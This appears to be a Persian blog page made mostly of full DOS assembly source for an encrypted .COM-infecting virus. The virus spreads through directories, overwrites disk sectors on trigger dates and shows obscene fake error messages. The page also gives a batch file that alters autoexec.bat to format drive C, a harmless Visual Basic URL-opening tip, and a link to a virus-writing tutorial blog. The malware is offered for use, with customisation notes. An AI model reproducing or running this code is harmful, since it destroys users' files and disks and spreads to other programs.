StackError equ 7 ;Cause a stack overflow (halts system)



tof: ;Top-Of-File
jmp begin ;Skip over program
idchar: db idc ;ID character

HostProgram: nop ;First run copy only!
nop ;First run copy only!

first_four: nop ;First run copy only!
address: int 20h ;First run copy only!
check: nop ;First run copy only!

begin: call nextline ;Push IP+3 onto stack
nextline: pop bp ;mov bp,ip
sub bp,offset nextline ;bp=disp. for mem locs

push ax ;Save AX
call cryptor ;Decrypt
jmp short retloc ;Continue program

cryptor: mov al,[bp+offset encrypt_val] ;encrypt val
lea si,[bp+offset toec] ;Top Of Encrypted Code
mov cx,offset eoec-offset toec ;Length of " "
cryptorloop: xor [si],al ;en/de crypt
rol al,cl ;change code #
inc si ;Next char please!
loop cryptorloop ;loop if necessary
ret ;Return to caller

infect: call cryptor ;Encrypt code
pop cx ;Restore CX for INT 21
int 21h ;Call DOS
call cryptor ;Decrypt code
ret ;Go back

toec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤTop Of Encrypted Code
InfectIt: push cx ;Save CX for sub
jmp infect

retloc: pop ax ;Restore AX
xor di,di ;DI = 0

cli ;Disable interrupts
mov ss,di ;Set up stack at:
mov sp,2F0h ; 0000:02F0
sti ;Enable interrupts

mov si,96h ;Vector for INT 24h
mov bx,ss:[si] ;BX = offset in segment
mov cx,ss:[si+2] ;CX = segment
lea dx,[bp+offset int24handler] ;CS:DX -} local handler
mov ss:[si],DX ;Save offset
mov ss:[si+2],cs ;Save segment
mov si,es:[di+2F8h] ;Check operation mode
cmp si,4643h ;'CF' if already TSRed
jne GoOn ;Nope, jmp
jmp return ;Yes, don't do anything

GoOn: mov cs:[di+4Ch],bx ;use unused part of PSP
mov cs:[di+4Eh],cx ; to save BX and CX
push cs ;Copy CS ...
pop es ; ... to DS

mov byte ptr [bp+offset infected],0 ;Reset infection count
mov byte ptr [bp+offset max2kill],3 ;Stop after 3 or less

GoOn2: lea si,[bp+offset first_four] ;Original first 4 bytes
mov di,offset tof ;TOF never changes
cld ;Read left-to-right
movsw ;Copy the 4 bytes
movsw ;Copy the 4 bytes

mov ah,1Ah ;Set DTA address ...
lea dx,[bp+offset DTA] ; ... to *our* DTA
int 21h ;Call DOS to set DTA

mov ah,4Eh ;Find First ASCIIZ
lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0
lea si,[bp+offset filename] ;Point to file
push dx ;Save DX
jmp short continue ;Continue...

return: mov ah,1ah ;Set DTA address ...
mov dx,80h ; ... to default DTA
int 21h ;Call DOS to set DTA
xor di,di ;DI= 0
mov es,di ;ES= 0
mov si,96h ;Vector for INT 24h
mov bx, cs:[di+4Ch] ;Restore from saved BX
mov word ptr es:[si+0], bx ;Place back into vector
mov cx, cs:[di+4Eh] ;Restore from saved CX
mov word ptr es:[si+2], cx ;Place back into vector
push cs ;Move CS ...
pop es ; ... to ES

mov ax,[bp+offset SavedAX] ;Restore AX
xor bx,bx ;BX= 0
mov cx,bx ;CX= 0
mov dx,cx ;DX= 0
mov si,dx ;SI= 0
mov di,si ;DI= 0
mov sp,0FFFEh ;SP= FFFEh (normal)
mov bp,100h ;BP= 100h (RETurn addr)
push bp ; Put on stack
mov bp,ax ;BP= 0
ret ;JMP to 100h

nextfile: or bx,bx ;Did we open the file?
jz skipclose ;No, so don't close it
mov ah,3Eh ;Close file
int 21h ;Call DOS to close it
xor bx,bx ;Set BX back to 0
skipclose: mov ah,4Fh ;Find Next ASCIIZ

continue: pop dx ;Restore DX
push dx ;Re-save DX
xor cx,cx ;CX= 0
xor bx,bx
int 21h ;Find First/Next
jnc skipjmp
jmp NoneLeft ;Out of files

skipjmp: mov ax,3D02h ;open file
mov dx,si ;point to filespec
int 21h ;Call DOS to open file
jc nextfile ;Next file if error

mov bx,ax ;get the handle
mov ah,3Fh ;Read from file
mov cx,4 ;Read 4 bytes
lea dx,[bp+offset first_four] ;Read in the first 4
int 21h ;Call DOS to read

cmp byte ptr [bp+offset check],idc ;Already infected?
je nextfile ;Yep, try again ...
;NOTE: Delete the two lines above if you want it to re-infected programs.

cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE?
je nextfile ;Yep, maybe next time!

mov ax,4202h ;LSeek to EOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

cmp ah,0F8h ;Longer than 62K?
ja nextfile ;Yep, try again...
mov [bp+offset addr],ax ;Save call location

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;Point to buffer
int 21h ;Save the first 4 bytes

mov ah,[bp+offset encrypt_val] ;Get code number
inc ah ;add 1
adc ah,0 ;increment if it's zero
mov [bp+offset encrypt_val],ah ;Save new code number

mov ah,40h ;Write to file
mov cx,offset eof-offset begin ;Length of target code
lea dx,[bp+offset begin] ;Point to virus start
call InfectIt ;Exempt from encryption
ComeBackHere: mov ax,4200h ;LSeek to TOF
xor cx,cx ;CX= 0
xor dx,dx ;DX= 0
int 21h ;Call DOS to LSeek

mov ax,[bp+offset addr] ;Retrieve location
inc ax ;Adjust location

mov [bp+offset address],ax ;address to call
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst.
mov byte ptr [bp+offset check],idc ;EOFMARK

mov ah,40h ;Write to file
mov cx,4 ;Write 4 bytes
lea dx,[bp+offset first_four] ;4 bytes are at [DX]
int 21h ;Write to file

inc byte ptr [bp+offset infected] ;increment counter
dec byte ptr [bp+offset max2kill] ;decrement counter
jz TheEnd ;If 0 then End

inc byte ptr [bp+offset encrypt_val] ;change code #
adc byte ptr [bp+offset encrypt_val],0 ;adjust if 0
jmp nextfile ;Next victim!

NoneLeft: cmp byte ptr [bp+offset infected],3 ;At least 3 infected?
jae TheEnd ;The party's over!

mov di,100h ;DI= 100h
cmp word ptr [di],20CDh ;an INT 20h?
je TheEnd ;Don't go to prev. dir.

lea dx,[bp+offset prevdir] ;'..'
mov ah,3Bh ;Set current directory
int 21h ;CHDIR ..
jc TheEnd ;We're through!
mov ah,4Eh
jmp continue ;Start over in new dir

TheEnd: xor di,di ;DI= 0
mov es,di ;ES= 0
mov ah,2ah ;Get date
int 21h ;Do it
cmp dl,4 ;4th of the month?
jne test2 ;Nope, second test
cmp dh,7 ;July?
jne test2 ;Nope, second test
xor ax,ax ;Sector 0
jmp Kill ;Kill the disk now...

test2: mov ah,2ch ;Get time
int 21h ;Do it
or cl,cl ;On the hour? (x:00 xM)
jnz GiveUp ;Return to program
cmp ch,6 ;Midnight to 5 AM ???
jnl GiveUp ;Return to program
add cl,ch ;Add first number
mov ax,cx ;Transfer to AX
cbw ;Zero out AH
add al,dh ;Add DL to AL
adc al,dl ;Add DL and carry flag
adc ah,0 ;Add carry to AH
or ax,ax ;AX = 0 ???
jnz Kill ;Kill the disk now...
inc ax ;Well, adjust first...

Kill: mov dx,ax ;Sector number
mov cx,1 ;One at a time....
xor bx,bx ;Point at PSP
mov ah,19h ;Get current disk
int 21h ;Call DOS to ^
int 26h ;Now kill the disk

GiveUp: mov bx,offset message_table ;point to table

mov ah,2ch ;Get time
int 21h ;Call DOS to ^
inc dh ;(0-59)

timeloop: cmp dh,msgs ;mapped yet?
jl timedone ;Yes, jump
sub dh,msgs ;try to map it
jmp short timeloop ;and check out work

timedone: mov al,dh ;AL gets msg #
mov cl,al ;Save in CL for CritErr
cbw ;AH gets 0
shl ax,1 ;AX = AX * 2
add bx,ax ;BX = index
mov si,[bx] ;SI points to string
mov ch,[si-1] ;CH is technique #
mov dx,si ;DX points to string

mov ah,9 ;Display string
int 21h ;Call DOS to ^

cmp ch,terminate ;Terminate program?
je TerminateProg ;Nope, next test

cmp ch,halt ;Halt program?
je $ ;Hang system if ch=halt

cmp ch,SimulateCritErr ;Simulate CritErr?
je simulate ;yes, go do it

cmp ch,Return2host ;Return to host?
je ResumeProgram ;yes, go do it

cmp ch,FlashFloppy ;Flash drive A:?
je FlashFlop ;Yes, go do it

cmp ch,WaitKey ;Wait for keypress?
je zwait ;Yes, go do it

cmp ch,PauseKey ;Pause message w/ wait?
je zpause ;Yes, go do it

cmp ch,StackError ;Stack overflow?
je StackErr ;Yes, go do it

;Invalid code, assume Return2host

ResumeProgram: jmp return ;Return to caller
StackErr: call $ ;Cause stack overflow
TerminateProg: int 20h ;Yep, all done!

simulate: lea dx,[bp+offset ARIFmsg] ;Abort, Retry ...
mov ah,9 ;Print string
int 21h ;Call DOS to ^

mov ah,1 ;Input a char
int 21h ;Call DOS to ^

lea dx,[bp+offset crlf] ;crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^

cmp al,'a' ;Uppercase?
jb uppercase ;Nope, jump
sub al,' ' ;Yes, make uppercase

uppercase: cmp al,'A' ;Abort?
je terminateprog ;Yep, go do it.

cmp al,'R' ;Retry?
jne zskip ;skip over "retry" code

lea dx,[bp+offset crlf] ;Point to crlf
mov ah,9 ;Print string
int 21h ;Call DOS to ^
mov dh,cl ;Restore DH from CL
jmp timedone ;Reprint error

zskip: cmp al,'I' ;Ignore?
je ResumeProgram ;Return to host program
cmp al,'F' ;Fail?
jne simulate ;Invalid response

lea dx,[bp+offset fail24] ;Point to fail string
mov ah,9 ;Print string
int 21h ;Call DOS to ^
int 20h ;Terminate program

FlashFlop: mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^

xor ax,ax ;Drive A:
mov cx,1 ;Read 1 sector
mov dx,ax ;Start at boot sector
lea bx,[bp+offset boot_sector] ;BX points to buffer
int 25h ;Flash light on A:
jmp short ResumeProgram ;Resume if no error

zpause: lea dx,[bp+offset pause] ;Point to pause message
mov ah,9 ;Print string
int 21h ;Call DOS to ^
zwait:
mov ah,1 ;Wait for keypress
int 21h ;Call DOS to ^
jmp short ResumeProgram ;Go on...





ARIFmsg db cr,lf,'Abort, Retry, Ignore, Fail?$'
fail24 db cr,lf,cr,lf,'Fail on INT 24'
crlf db cr,lf,'$'

message_table:
dw offset msg1
dw offset msg2
dw offset msg3
dw offset msg4
dw offset msg5
dw offset msg6
dw offset msg7
dw offset msg8
dw offset msg9
dw offset msg10
dw offset msg11
dw offset msg12
dw offset msg13
dw offset msg14
dw offset msg15
dw offset msg16
dw offset msg17
dw offset msg18
dw offset msg19
dw offset msg20

msgs db 20

; I tried to make it as simple as possible to change the messages
; and add/delete them. Each message is in the format:
;
; db [technique]
;[label] db [Text]
;
; Where [technique] is one of the 8 codes shown at the beginning of
; this file (terminate, halt, etc.). This determines what the virus
; should do after printing the message.
; [label] is in the form "msg##" where ## is a number from 1 to
; "msgs". "msgs" is defined immediately before this
; comment block.
; [text] is a combination of text and ASCII codes, terminated by
; either a '$' or a ,36.
;
; If you change the number of messages the virus has, you should also
; add/remove lines from the offset table and change the "msgs"
; data byte appropriately. Let's say for instance that you want
; to remove "Program too big to fit in memory.":
; 1) Delete the line(s) with the message and the line
; immediately before it.
; 2) Move message #20 up to message #2's position and
; change its label from "msg20" to "msg2".
; 3) Delete the line "dw offset msg20" from the offset
; table.
; 4) Change the line before this comment block to:
; "msgs db 19"
;
; Later!
; -The BOOT SECTOR Infector ...
;

db FlashFloppy ;Waits for key, then flashes drive A:
msg5 db 'I',39,'m hungry! Insert PIZZA & BEER into drive A: and',cr,lf
pause db 'Strike any key when ready... $'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg1 db 'Impotence error reading user',39,'s dick$'

db terminate ;Ends the program immediately
msg2 db 'Program too big to fit in memory',cr,lf,'$'

db halt ;Halts the system
msg3 db 'Cannot load COMMAND, system halted',cr,lf,'$'

db terminate ;Ends the program immediately
msg4 db 'I',39,'m sorry, Dave.... but I',39,'m afraid'
db ' I can',39,'t do that!',cr,lf,'$'

db WaitKey ;Waits for a keypress, then runs the program
msg6 db 'Format another? (Y/N)? $'

db StackError ;Generates a stack overflow (halts the system)
msg7 db 'Damn it! I told you not to touch that!$'

db terminate ;Ends the program immediately
msg8 db 'Suck me!',cr,lf,'$'

db SimulateCritErr ;Prints ARIF message and responds appropriately
msg9 db 'Cocksucker At Keyboard error reading device CON:$'

db terminate ;Ends the program immediately
msg10 db 7,cr,cr,cr,7,cr,cr,cr,7,cr,cr,cr,lf
db 'I',39,'m sorry, but your call cannot be completed as dialed.'
db cr,lf,'Please hang up & try your call again.',cr,lf,'$'

db terminate ;Ends the program immediately
msg11 db 'No!',cr,lf,cr,lf,'$'

db halt ;Halts the system
msg12 db 'Panic kernal mode interrupt$'

db WaitKey ;Waits for a keypress, then runs the program
msg13 db 'CONNECT 1200«',cr,lf,cr,lf,'$'

db return2host ;Runs host program immediately
msg14 db 'Okay, okay! Be patient! ...',cr,lf,'$'

db terminate ;Ends the program immediately
msg15 db 'And if I refuse?',cr,lf,'$'

db return2host ;Runs host program immediately
msg16 db 'Fuck the world and its followers!',cr,lf,'$'

db return2host ;Runs host program immediately
msg17 db 'You are pathetic, man... you know that?',cr,lf,'$'

db terminate ;Ends the program immediately
msg18 db 'Cum on! Talk DIRTY to me !!!',cr,lf,'$'

db terminate ;Ends the program immediately
msg19 db 'Your coprocessor wears floppy disks!',cr,lf,'$'

db PauseKey ;Waits for keypress (SAKWR), then runs host prg
msg20 db 'Joker! ver àà by TBSI!',cr,lf
db 'Remember! EVERYTHING',39,'s bigger in Texas!',cr,lf,'$'

int24handler: xor al,al ;Ignore the error
iret ;Interrupt return


filespec: db '*.COM',0 ;File specification
prevdir: db '..',0 ;previous directory
max2kill db 3 ;max. files to infect

eoec:;ؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤؤEnd Of Encrypted Code
VersionNumber dw 100h ;Version 1.00
encrypt_val db 0 ;1st-run copy only

; None of this information is included in the virus's code. It is only used
; during the search/infect routines and it is not necessary to preserve it
; in between calls to them.

eof:
DTA:

db 21 dup (?) ;internal search's data
attribute db ? ;attribute
file_time db 2 dup (?) ;file's time stamp
file_date db 2 dup (?) ;file's date stamp
file_size db 4 dup (?) ;file's size
filename db 13 dup (?) ;filename

SavedAX dw ? ;Used to save AX
infected db ? ;infection count
addr dw ? ;Address

boot_sector:

main endp;rocedure
code ends;egment

end

وستان اگر میخواهید با یک کلیک هاردتان Format (پاک) شود این کدها را در Note pad ریخته و آنرا با پسوند Bat ذخیره کنید مثلا Format Hard.bat حال مواظب باشید که روی آن کلیک نکنید چون هارد شما صفر کیلومتر خواهد شد



@echo off
call attrib -r -h c:\autoexec.bat
echo @echo off >c:\autoexec.b
echo format /autotest c:/q>nul
call attrib +r +h c:\autoexec.ba
exit

برنامه ای که قرار بگم با استفاده از یک کلیک به ادرس اینترنتی مورد نطر شما برود
این برنامه برای افرادی مناسب است که برنامه ای ساخته باشند و بخواهند در برنامه
ادرس سایت یا وبلاگ خود را بگذارند .
ویژوال بییک را اجرا کنید Standard EXE را انتخاب و open را بزنید حال در منوی projectدر بالای صفحه گزینه References را بزنید گزینه microsoft shell contros and automation را پیدا کنید وتیک بزنید و در آخر ok کنید حال روی form1 دابل کلیک کنید ودر قسمت بالای صفحه(general نام دارد) عبارت زیر را تایپ کنید
Dim a As New Shell
حال یک کنترل command button را به form1 اضافه کنید وخاصیت caption ان را برابر go to web کنید و enter را بزنید روی command button دابل کلیک کنید
و در پنجره کدنویسی ان فرمتن زیر را تایپ کنید
" a.Open "http://parvizh.blogfa.com
به جای http://parvizh.blogfa.com هر ادرسی را که دوست دارید بنویسیدحال برنامه را امتحان ودر ویندوز قرار دهید.

توجه:دوستانی که می خواهند آموزش ساخت ویروس ببینند به وبلاگ دوست خوبم
بابک مراجعه کنند ادرس وبلاگ http://irvirus.blogfa.com